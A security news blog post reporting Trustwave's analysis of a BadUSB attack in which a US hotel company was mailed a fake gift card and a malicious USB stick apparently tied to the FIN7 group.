Attackers exposed the American company to a rare attack via BadUSB

Rare attack via BadUSB

Trustwave experts published a report, in which they said that the American company was exposed to a rare attack through BadUSB. An unnamed American hotel company was mailed a fake BestBuy gift card along with a malicious USB stick.

The accompanying letter said that the drive must be connected to a computer in order to access the list of products for which you can use a gift card.

Rare attack via BadUSBSuch targeted attacks by BadUSB are extremely rare in practice.

Let me remind you that BadUSB is a class of attacks that allows using tools like Rubber Ducky to take control of many devices that have a USB port. In this way, you can emulate any peripherals, but most often criminals fake a keyboard.

“The victim company found the letter suspicious and turned for help in investigating the incident”, – say experts at Trustwave.

As found the researchers, after connecting BadUSB to the test workstation, the flash drive launched the PowerShell command (through a series of automatic keystrokes). In turn, this command downloaded a more voluminous PowerShell script from a remote site, and then installed a Malware bot – a JScript-based bot – on the test machine.
Rare attack via BadUSB

“At the time of the analysis, we were not able to find another similar strain of malvari. The malware is unknown to us. It is difficult to say whether it was created on an individual order, but probably it was, because it is not very widespread and seems to be targeted”, – say the experts.

Trustwave experts told ZDNet that after the initial analysis, a file similar to the malware was uploaded to VirusTotal for analysis.

According to a subsequent analysis by Facebook experts, the file is probably associated with the well-known hacker group FIN7 (aka Carbanak, Carbon Spider, Anunak). It is unclear who uploaded the file to VirusTotal. Perhaps other information security experts that are also investigating the BadUSB attack on another victim did it.

“Similar [BadUSB] attacks are often modeled during pentests and used during red team exercises. But in the real world, attacks of this type are much less common”, – say experts at Trustwave.

Let me remind you that the last time Kaspersky Lab researchers described a practical attack of the BadUSB type in December 2018. Then it became known about the attacks on banks, called DarkVishnya. As part of this campaign, the attackers used a special tool for conducting USB attacks Bash Bunny, comparable in size to a regular USB flash drive.

Please read about other serious dangers of USB devices.

By Vladimir Krasnogolovy

Vladimir is a technical specialist who loves giving qualified advices and tips on GridinSoft's products. He's available 24/7 to assist you in any question regarding internet security.

Leave a comment

Your email address will not be published. Required fields are marked *